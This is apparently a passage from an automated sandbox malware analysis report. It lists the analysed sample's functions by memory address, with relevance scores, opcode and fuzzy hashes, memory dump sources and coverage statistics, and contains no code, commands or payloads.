                                                                                                                                                                                  • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                                                                                  • Instruction Fuzzy Hash: DE11E176404280CFDB12CF44D5C4B56BFB2FB94328F24C2A9D9094B657C33AE55ACBA1
                                                                                                                                                                                  Function 018FD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733292144.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18fd000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                  • Instruction ID: 27dcb79649bbcd8619edbf8579e3297445fe5bee244fea312d1e27af6fe86c4e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                  • Instruction Fuzzy Hash: DF11BE79504240DFDB12CF54C5C0B15BB62FB84324F24C6AEDA498B656C33AE44ACB91
                                                                                                                                                                                  Function 018FD017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733292144.00000000018FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018FD000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18fd000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                  • Instruction ID: 7714d43cf2c58c86d3ce1d57c6f63d52bddb0f6ac3ac01a02faf485276cf6a12
                                                                                                                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2311BB75504280CFDB16CF58D5C4B15FBA2FB84314F24C6AEDA098B656C33AD54ACBA2
                                                                                                                                                                                  Function 018ED745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733268251.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18ed000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b629bde1a547f90c2049de5e1fb23786abb349124b9c3173085d33a80b873f4c
                                                                                                                                                                                  • Instruction ID: e3660febf30c6228e93d73b1b5a2d3922ece0faf3f0323d57456afad87bff01f
                                                                                                                                                                                  • Opcode Fuzzy Hash: b629bde1a547f90c2049de5e1fb23786abb349124b9c3173085d33a80b873f4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 55012B710493849AE7104FA9CDC8B66FFD8DF42324F08C61AED198A282D6399948C671
                                                                                                                                                                                  Function 018ED744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733268251.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_18ed000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fd901fbd79eef2e76914b0bc569e1240a00f5cc46e011ad8e2153451381bcaee
                                                                                                                                                                                  • Instruction ID: 0a66033f10e856855005436f6e60904b0b638530891fd8006f82c3b07854358f
                                                                                                                                                                                  • Opcode Fuzzy Hash: fd901fbd79eef2e76914b0bc569e1240a00f5cc46e011ad8e2153451381bcaee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF0C2714043809AE7108F1ACDC8B62FFD8EB41334F18C55AED084A287C2799944CBB0

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 0A390040 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'fq$TJkq$Tefq$pjq$xbiq
                                                                                                                                                                                  • API String ID: 0-2688501482
                                                                                                                                                                                  • Opcode ID: 27039d5b1ffc0314076b53c1379c85ba053c6dfa3020ea61d8cc82f14146da85
                                                                                                                                                                                  • Instruction ID: 50b541655e1acd746be764ee31e197134aa8d7d78a1c5425fc8b116bb456626c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 27039d5b1ffc0314076b53c1379c85ba053c6dfa3020ea61d8cc82f14146da85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB2B175E00628DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40
                                                                                                                                                                                  Function 0A390007 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: TJkq$Tefq$xbiq
                                                                                                                                                                                  • API String ID: 0-2501753584
                                                                                                                                                                                  • Opcode ID: 2461d8ced2ff72c997bddcaeab9c76cc1306758e648bcbc468427810b80fcac3
                                                                                                                                                                                  • Instruction ID: 233c4c657a1877c09f13dc0ba958c78b5be11dc41d25e65cad20bdc3a8273a25
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2461d8ced2ff72c997bddcaeab9c76cc1306758e648bcbc468427810b80fcac3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8C1A375E016588FDB59CF6AC9846D9BBF2AF89300F14C0EAD809AB365DB305E85CF50
                                                                                                                                                                                  Function 0A39B2B8 Relevance: 2.8, Strings: 2, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @C7$gYZW
                                                                                                                                                                                  • API String ID: 0-391137493
                                                                                                                                                                                  • Opcode ID: 63dae817b91a5a3c908e4bd73e9785b2ab5a13149f0ea8dda38d221d970e1691
                                                                                                                                                                                  • Instruction ID: 19dc7dfb0503b2dd4c99af4a97846d62b9ba35572405c9cd8ee1017096292e60
                                                                                                                                                                                  • Opcode Fuzzy Hash: 63dae817b91a5a3c908e4bd73e9785b2ab5a13149f0ea8dda38d221d970e1691
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48E11774E141198FDB14DFA9D5909AEFBB2FF89304F248169E818AB355D730AD42CFA0
                                                                                                                                                                                  Function 0A39A008 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: l67
                                                                                                                                                                                  • API String ID: 0-8406959
                                                                                                                                                                                  • Opcode ID: c556b23ca38a755b754f5aca1e73bd0c6d63fdc397846b3de2d48c4635c28e1c
                                                                                                                                                                                  • Instruction ID: 6c1a88bf263ad3e7d4bf074d74dea56552476060d195756e468466c42cef1579
                                                                                                                                                                                  • Opcode Fuzzy Hash: c556b23ca38a755b754f5aca1e73bd0c6d63fdc397846b3de2d48c4635c28e1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40E10674E141198FDB14CFA9C5909AEBFB2FF89304F248269E815AB355D731AD42CFA0
                                                                                                                                                                                  Function 0A39BFB8 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: I7
                                                                                                                                                                                  • API String ID: 0-4040697463
                                                                                                                                                                                  • Opcode ID: bb55436369aff0cf70b9e3cc2c89444eec9c2d2b51aa5e1f5e20c4d0c70c921a
                                                                                                                                                                                  • Instruction ID: 357d68ab559ebd4ebda79ebbb604b018b3d60adbbdd1fa588060c686cc863ea2
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb55436369aff0cf70b9e3cc2c89444eec9c2d2b51aa5e1f5e20c4d0c70c921a
                                                                                                                                                                                  • Instruction Fuzzy Hash: FF510870E152198FDB14CFA9C5905AEFBB2FF89304F24816AD418AB356D730AD42CFA1
                                                                                                                                                                                  Function 02FE2CE8 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6;%x
                                                                                                                                                                                  • API String ID: 0-1779915769
                                                                                                                                                                                  • Opcode ID: deff396f80e8c9ad98b5688a74c0faf0f2ce5e77cdfcb4c597325fb7e035d42d
                                                                                                                                                                                  • Instruction ID: cd70e43331c07ea00c7058501603ad98e796dc99903cb56b000e813104c0df20
                                                                                                                                                                                  • Opcode Fuzzy Hash: deff396f80e8c9ad98b5688a74c0faf0f2ce5e77cdfcb4c597325fb7e035d42d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8841CF32710615CFCB25CB29D985A5EB7FAFB85390B14882BE61BCB664E230E941CF41
                                                                                                                                                                                  Function 02FE0909 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: D
                                                                                                                                                                                  • API String ID: 0-2746444292
                                                                                                                                                                                  • Opcode ID: 0619901e23ed8030db5a35306ac48d003c4eaf08ea587574be5f194c6656500d
                                                                                                                                                                                  • Instruction ID: e9d8273c8b168d02aec6efbe576270e3519a183483ba4d1e9f64d7fc4977f1c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0619901e23ed8030db5a35306ac48d003c4eaf08ea587574be5f194c6656500d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 14319071E20209CFCB49CE69C541CAFF7B5BB89200B90C56AC522BB154CB70D641CFA5
                                                                                                                                                                                  Function 0A399BE0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9bae14abaad7c114a1d3ffaf72a334bd4e16a0f8ce7c2ab7297be6010087f0e7
                                                                                                                                                                                  • Instruction ID: 6bc89c5b014b15b39bb48b547f13b9afda25a73e96b09ca81e93f86cae2c3b24
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bae14abaad7c114a1d3ffaf72a334bd4e16a0f8ce7c2ab7297be6010087f0e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57E1F874E141198FDB14CFA9C590AAEFBB2FF89305F248169E419AB355D730AD42CFA0
                                                                                                                                                                                  Function 0A39BFC8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8dfef183d8d78bf420cf3696dc27ae66e5998860530b5df206fa1a3d997cdf85
                                                                                                                                                                                  • Instruction ID: 2527e30c7b5c058b58fb612893d27eb528a5be45263d5969a7ea72628158159d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dfef183d8d78bf420cf3696dc27ae66e5998860530b5df206fa1a3d997cdf85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 18E12A74E141198FDB14CFA9C5909AEFBB2FF89304F249169E819AB356C734AD41CFA0
                                                                                                                                                                                  Function 0A39B6F0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d45f3e3690681650dc59139a834bf6de0a7c7e5d4eaa0cce60c485832b238ea5
                                                                                                                                                                                  • Instruction ID: 6a11330632dcd641f6a399f8ed2aaa6f24d704e0113138506698b0967c4eef36
                                                                                                                                                                                  • Opcode Fuzzy Hash: d45f3e3690681650dc59139a834bf6de0a7c7e5d4eaa0cce60c485832b238ea5
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4E11774E141198FDB14CFA9D5909AEFBB2FF89304F248169E815AB355D730AD82CFA0
                                                                                                                                                                                  Function 0A3928E8 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dfa77506849d6a0f07232ab47d9d3850ddab7e349c31c81efe883dfcfbd9db57
                                                                                                                                                                                  • Instruction ID: 2a9168c1157a4fa83058ece2735f91a70225fc2173f85baa81f2df324a592345
                                                                                                                                                                                  • Opcode Fuzzy Hash: dfa77506849d6a0f07232ab47d9d3850ddab7e349c31c81efe883dfcfbd9db57
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3A1C274D09619EFDF24DFAAC8447EEBBFABB89300F109169D409A7251DB344985CF40
                                                                                                                                                                                  Function 0A3928D8 Relevance: .2, Instructions: 237COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1745275323.000000000A390000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A390000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a390000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6b321d07bb4d1d8e5915d9515ae3fdc7d3332b0b4a3581520aee68e92d8a4f8e
                                                                                                                                                                                  • Instruction ID: 0943f5548054bd7fc36fbaf7cad74d497ebedcfa8a2f31793ee1f1ae57671b00
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b321d07bb4d1d8e5915d9515ae3fdc7d3332b0b4a3581520aee68e92d8a4f8e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 70A1C170D05619EFDF24DFAAC8447EEBBFABB89300F10916AD409A7251DB744A85CF40
                                                                                                                                                                                  Function 02FE13C1 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 83e1a3fa45e5b8b3e306d5548e07398e7f286d60b52249230d499f8e7fe48a0a
                                                                                                                                                                                  • Instruction ID: bc503807182cd9e08d0cc4c191cf53195147b2feb122c4b186d930521400da9f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 83e1a3fa45e5b8b3e306d5548e07398e7f286d60b52249230d499f8e7fe48a0a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E41D432B042158FCB05CEAAD58056FBBF7EBC9241B20906BD51BE7350D730CE01CA91
                                                                                                                                                                                  Function 02FE37EA Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9b90d9620b59aa15c68274f5b63bb65ce67530aea9555279a476d62b05a60973
                                                                                                                                                                                  • Instruction ID: 3a68adcc40292fe72c592412e8b206bdfb81cec4f671196af4d18b54c4e26c02
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b90d9620b59aa15c68274f5b63bb65ce67530aea9555279a476d62b05a60973
                                                                                                                                                                                  • Instruction Fuzzy Hash: D3418137F1411A8FCF44CF59C9899AEBBA6FB88240B458567DA16EB350C634DE01CF91
                                                                                                                                                                                  Function 02FE37F8 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 458d9fd1fe5a3038424ff5305bd253421ec439e6379cf450c33d061a74e61322
                                                                                                                                                                                  • Instruction ID: d4b17ae99ae6415cd8da99731a8118c17e855b58b564e54d2081b86d13a83e48
                                                                                                                                                                                  • Opcode Fuzzy Hash: 458d9fd1fe5a3038424ff5305bd253421ec439e6379cf450c33d061a74e61322
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A419F33F1411A8FCF44CF59C9899AEBBA6FB88240B55C5A7DA16EB350C234DE01CB91
                                                                                                                                                                                  Function 02FE2CDA Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 76854bba73a635c202f088ab0c16d8ceff21e54ec3d8cf2925426c4c0d4a01b8
                                                                                                                                                                                  • Instruction ID: 02309219be23bd28c03bc3156fa095d5868a26ab783db230ca1183f9c7657d25
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76854bba73a635c202f088ab0c16d8ceff21e54ec3d8cf2925426c4c0d4a01b8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6841CF32710615CFCB25CB29D985A5EB7FAFB85390F14882BE65BCB664E230E940CF41
                                                                                                                                                                                  Function 02FE092B Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 26ce2a000834f27a5c93b891027c13cdd748830ae20c2b480a1d37b61aa0acd0
                                                                                                                                                                                  • Instruction ID: 89b99579943ab911c0ecaf3c097283f898646820065ec82b17c201e74954115d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 26ce2a000834f27a5c93b891027c13cdd748830ae20c2b480a1d37b61aa0acd0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8431A231E20215CBCF59CE69C4848AEFBB5BF89200B90C56AC567AB155CB70D641CF95
                                                                                                                                                                                  Function 02FE0B58 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d2bc52cb977105aab064ee94d31f7fb687d71ed1ddd8e0a78e39d35b1e017aad
                                                                                                                                                                                  • Instruction ID: 011633ff7e5677d4a62ace1f7d88366e940b49b4a317f64618105fc776ac5652
                                                                                                                                                                                  • Opcode Fuzzy Hash: d2bc52cb977105aab064ee94d31f7fb687d71ed1ddd8e0a78e39d35b1e017aad
                                                                                                                                                                                  • Instruction Fuzzy Hash: B8319231D20209CFCB59CE69C58189EFBB6BB49200B90C66AC522BB115DB70DA41CFA4
                                                                                                                                                                                  Function 02FE0BC3 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: afb36048993006d6dc0e645454ab8d24492c51085207695255d67df53d7ed49c
                                                                                                                                                                                  • Instruction ID: e3df8d759cddc40d39530068ab537feb3559c3b27c0ced436358758c87949549
                                                                                                                                                                                  • Opcode Fuzzy Hash: afb36048993006d6dc0e645454ab8d24492c51085207695255d67df53d7ed49c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B319471D20219CFCF49CE69C441C9EF7B5BB49200B90C56AC522FB254DB70D641CFA4
                                                                                                                                                                                  Function 02FE0971 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1733469365.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2fe0000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6f724f58e7b445c3ce3a81b75e3e751e1b712e68021569ba6b302c369f2f5fde
                                                                                                                                                                                  • Instruction ID: d8a05dbee35153c02c8859c13ebcde6235b6941abfc6a2d621eeeae5db9c43e7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f724f58e7b445c3ce3a81b75e3e751e1b712e68021569ba6b302c369f2f5fde
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F317071E20219CF8B89CF69C441C9EF7F5BF49200B90C56AC526BB214DB70D681CFA5

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:1.2%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                                                                  Signature Coverage:8.2%
                                                                                                                                                                                  Total number of Nodes:146
                                                                                                                                                                                  Total number of Limit Nodes:16
